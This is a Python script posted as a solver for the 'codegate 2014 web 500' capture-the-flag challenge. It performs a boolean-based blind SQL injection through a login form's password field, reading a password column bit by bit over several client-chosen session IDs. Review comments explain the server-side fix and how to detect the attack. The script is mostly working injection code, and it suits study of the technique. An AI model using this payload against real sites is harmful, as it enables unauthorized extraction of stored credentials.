tunz

codegate 2014 web 500

Feb 23rd, 2014
import httplib
import urllib
import sys
import time

# code by tunz
#
# Solver for the "codegate 2014 web 500" challenge: a boolean-based blind SQL
# injection that reads a `password` column one bit at a time.
#
# How it works, as far as this file shows:
#   * The `password` form field is sent with a SQL fragment instead of a
#     password.  The fragment compares one binary digit of one character of
#     the `password` column with '1' (0x31).
#   * A response body containing "True" is read as "that bit is 1".
#   * Eight such answers, most significant bit first, rebuild one character.
#
# NOTE(review): the server code is not part of this page.  The probe can only
# work if the form field reaches the SQL text unescaped, so the fix on the
# server side is presumably a parameterized query for the password lookup.
# For detection: each recovered character costs eight almost identical POSTs
# whose `password` value contains substr/ascii/bin, which stands out in
# request logs.

TARGET_HOST = '58.229.183.24'
TARGET_PATH = '/5a520b6b783866fd93f9dcdaf753af08/index.php'

conn = httplib.HTTPConnection(TARGET_HOST, 80)
conn.connect()

session_header = '95hem28h053quulk22r5696me'

answer = ""


def session_cookie(suffix):
    """Return the Cookie header value for the session ID ending in *suffix*."""
    return 'PHPSESSID=' + session_header + suffix + ';'


def open_session(suffix):
    """GET the page once with a client-chosen session ID and drain the reply."""
    conn.putrequest('GET', TARGET_PATH)
    conn.putheader('Cookie', session_cookie(suffix))
    conn.endheaders()
    # The body must be read in full before the connection can be reused.
    return conn.getresponse().read()


def probe_bit(position, bit, suffix):
    """Ask whether binary digit *bit* (1 = most significant) of character
    *position* of the password column is '1'; return True on a "True" page."""
    # LPAD(bin(...),8,0) left-pads the binary form to eight digits so that
    # digit positions 1..8 always line up with bit weights 128..1.
    query = ("' or substr(LPAD(bin(ascii(substr(password," + str(position)
             + ",1))),8,0)," + str(bit) + ",1)=0x31 and 'a' = 'a")
    params = 'password=' + urllib.quote(query)
    conn.putrequest('POST', TARGET_PATH)
    conn.putheader('Content-length', str(len(params)))
    conn.putheader('Content-Type', 'application/x-www-form-urlencoded')
    conn.putheader('Cookie', session_cookie(suffix))
    conn.endheaders()
    conn.send(params)
    return "True" in conn.getresponse().read()


# create sessions
# Ten session IDs are used: the fixed prefix plus one digit, '0' to '9'.
# NOTE(review): the IDs are picked by the client; whether the server accepts
# them as-is is not visible here (PHP's session.use_strict_mode would refuse
# IDs it did not issue) -- confirm against the challenge.
for slot in range(10):
    suffix = str(slot)
    print("Session make: " + suffix)
    open_session(suffix)

# injection
# Each session is used for five characters (5 * 8 = 40 requests), presumably
# to stay under a per-session limit that is not shown on this page.
for slot in range(10):
    suffix = str(slot)
    first = 1 + slot * 5
    for position in range(first, first + 5):
        code = 0
        for bit in range(1, 9):
            if probe_bit(position, bit, suffix):
                code += 1 << (8 - bit)
                print(str(bit) + " " + str(code))
        answer = answer + chr(code)
        print("Find: " + answer)
    # The value being read is expected to be 30 characters long.
    if len(answer) == 30:
        break

print("Answer: " + answer)
print("Session: " + session_header + '9')

conn.close()